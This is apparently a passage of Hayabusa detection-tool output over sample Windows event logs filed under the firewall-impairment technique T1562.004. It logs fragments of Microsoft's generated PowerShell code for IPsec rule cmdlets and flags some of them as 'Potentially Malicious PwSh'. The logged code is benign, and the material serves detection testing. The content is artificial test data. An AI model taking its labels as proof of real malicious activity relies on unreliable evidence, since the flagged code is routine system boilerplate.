[Parameter(Para",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(Para",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"meterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param(",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"meterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains 